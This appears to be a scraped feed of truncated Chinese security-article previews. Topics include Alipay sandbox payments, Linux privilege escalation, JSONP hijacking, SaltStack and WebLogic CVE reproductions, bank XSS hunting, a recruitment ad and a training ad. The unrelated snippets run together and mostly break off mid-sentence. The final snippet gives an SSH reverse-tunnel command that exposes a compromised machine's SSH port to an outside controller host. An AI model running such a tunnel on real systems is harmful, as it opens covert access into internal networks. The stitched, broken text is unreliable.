CTF_Hacker-Toolshttps://github.com/r-money/ctf_hacker-tools
调用支付宝接口实现付款功能首先去沙箱创建一个开发者用户: 沙箱链接进入以后左边栏是如下界面: 点击沙箱账号,进行虚拟money的设置(先充它一个亿再说~~哈哈哈)然后接下来进行代码的实现: Controllerpackage com.douzi.mall.controller;
import com.alipay.api.AlipayApiException;
import com.alipay.api.AlipayClient;
import
Linux通过栈溢出进行提权实战(dpwwn03)最近在刷vulnhub靶场,偶然间做到了dpwwn系列的靶场,其中dpwwn03靶场提权用的是程序栈溢出的漏洞,相对常规方法还是比较少见的,所以拿出来单独在这里研究下。既然讲到了提权,顺带介绍下常规的提权方式:1、内核漏洞例如脏牛这类型的。2、定时任务Cron通常以root特权运行。如果我们可以成功修改cron中的任何脚本或二进制文件,那么我们可以使用root权限执行任意代码。3、suid提权SUID代表设置的用户ID,是一种Linux功能,允许
基于AST的JSONP劫持自动化挖掘(带工具) 0x01 JSONP劫持简介JSONP利用 script标签的跨域能力实现跨域数据的访问。请求动态生成的JS脚本同时带一个callback函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用callback函数。JSONP劫持,就是在受害不知情的情况下,访问了攻击者的网站,攻击者通过JSONP接口获取用户在其它网站的敏感信息。因此通常用做:敏感信息泄露引发的精准诈骗。防守方的溯源能力之一,如在蜜罐中获
SaltStack Shell 注入 (CVE-2020-16846)漏洞SaltStack Shell 注入 (CVE-2020-16846)漏洞复现一、漏洞简介SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两=个主要功能:• 配置管理系统,能够将远程节点维护在一个预定义的状态• 分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询
CVE-2020-14882&14883weblogic未授权命令执行漏洞复现CVE-2020-14882&14883 weblogic未授权访问漏洞https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDfdd4-97c8-4e32-89b7-df58dd102e4c&pk_campaign=weixin-wemedia简介 WebLogic 是美国 Oracle 公司的主要产品之一,是商业市场上主要的 J2EE
好久没写文章了,分享一个银行XSS漏洞挖掘技巧过程PS:明年可能去XX或者XX深造深造众所周知,银行的业务系统,是很安全的,不管是接口还是其他的服务,都相对比较成熟,很难挖到有价值的漏洞今天有空写篇文章,简单分享一个银行XSS漏洞,逻辑漏洞技巧挖掘过程以前也挖过银行类的漏洞,都是有保密协议的首先我们得到的目标是一个微信公众号,在这里我们可以随便点开一个页面,获得连接,这时候我们需要发包工具进行测试推荐:fidder,很方便抓到一个地址发现是一个POST方法,token接口,意味着身份识别,这时候
玄猫安全实验室招聘渗透测试人才投递邮箱:lyon.chen@xuanmao.org(投递时邮件主题请包含投递的岗位名称,并注明来自安全客 ) 平台简介玄猫安全实验室专注于WEB安全、红蓝军攻防演练、漏洞挖掘、高级渗透测试、区块链安全等领域,团队成员来自于腾讯、阿里、360等国际顶尖安全团队,在国内网络安全领域拥有十年以上的从业经验团队。凭借卓越的技术实力和丰富的实战经验,已为数十家银行、保险、交易所、执法机关等提供基础安全建设、渗透测试、漏洞挖掘、应急响应等安全服务。 联系方
注册信息安全专业人员CISP-PTE渗透测试工程师认证培训班组织形式指导单位:中国信息安全测评中心主办单位:北京中培伟业管理咨询有限公司 课程背景为提高各单位信息安全整体水平,加强信息安全人员专业技能,促进信息安全人员持证上岗,现组织开展注册信息安全专业人员攻防领域(CISP-PTE)培训及认证工作,此认证是信息安全从业人员的水平证书,证明证书持有者具备从事信息安全技术领域网站渗透测试工作,具有规划测试方案、 编写项目测试计划、编写测试用例、测试报告的基本知识和能力。此证书为从事信息安
linux提权ssh隧道访问内网服务器ssh -N -f -R 2222:127.0.0.1:22 123.123.123.123ssh -p 2222 localhost2222可以随意设置端口127.0.0.1就是被控端的IP,端口就是22,SSH服务123代表主控端然后使用SSH -P 2222 localhost可访问公网的内网ssh